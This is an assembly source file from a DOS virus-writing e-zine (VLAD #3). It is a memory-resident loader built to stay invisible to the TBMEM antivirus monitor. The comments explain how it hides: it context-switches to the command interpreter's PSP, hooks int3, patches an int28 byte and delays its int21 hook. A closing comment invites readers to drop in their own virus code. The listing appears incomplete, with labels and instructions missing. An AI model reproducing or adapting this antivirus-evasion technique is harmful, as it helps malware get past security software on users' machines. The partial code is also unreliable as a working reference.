; Catch-22, a TSR loader by Rhincewind [Vlad]
; This is probably the most experimental thing I've done so far. In this
; loader I've combined a few things I learned about tbmem into a pretty
; neat loader that the current version of tbmem will not detect.
; The highloader is pretty straightforward, although it does use one
; trick I found. It traces the PSP chain all the way back to the command
; interpreter, then makes that PSP active before a block is allocated for
; the loader. This so-called 'context switching' will make the newly
; allocated block property of your command interpreter, ensuring it's
; lasting residency. Down with direct MCB twiddling!
; Now tbmem comes into play. First, two facts:
; Fact 1 - Tbmem detects residency on vectorchanges only. It can't be
; bothered to look at the memory itself.
; Fact 2 - Tbmem does not flag on intel reserved registers being hooked.
; For starters the loader will hook int3, thereby not alerting tbmem as
; above. The first byte of the int28 handler, which is an IRET in the
; original handler, will be overwritten
; with an int3. Now, as you probably know, only the command
; interpreter calls int28 (Okay, so do Terminate and a handful of other
; programs, watch out for those) which is redirected to our routine.
; We managed to get a routine active around tbmem! Hurray! Now, the int3
; handler will countdown 75 times, 13 is the minimum btw, to make sure
; that we're back in command mode, that is, out of the dos deallocation
; routines before we hook int21, which again, will elude tbmem. Both int28
; and int3 are restored and we're done with our loader.
parasize equ (endloader-start)
mov ax, 'TB'
cmp ax, 'AV'
mov ah, 4ah
sub bx, parasize+2
cmp bx, word ptr ds:[si+16h]
mov bx, word ptr ds:[si+16h]
mov ah, 50h
mov ah, 48h
mov ah, 50h
mov si, 100h
mov cx, endloader-start
mov si, 3*4
mov word ptr [si-4],offset install_21-100h
mov word ptr [si-2],es
mov si, 28h*4
mov word ptr es:[di],75h
lds bx, dword ptr ds:[si-4]
mov al, 0cch
xchg byte ptr ds:[bx],al
;Restore all registers here, including DS&ES
dec word ptr cs:counter-100h
les di, dword ptr cs:int2offset-100h
mov al, byte ptr cs:orgbyte-100h
les di, dword ptr cs:intoffset-100h
mov word ptr ds:[0ch],di
mov word ptr ds:[0eh],es
mov ax,offset int21-100h
xchg ax, word ptr ds:[84h]
xchg ax, word ptr ds:[86h]
;Replace the handler below with your k-rad virus code.
mov ax, 'AV'
jmp dword ptr cs:intoffset-100h
intoffset dw ?
intseg dw ?
int2offset dw ?
int2seg dw ?
counter dw ?
orgbyte db ?
- VLAD #3 INDEX -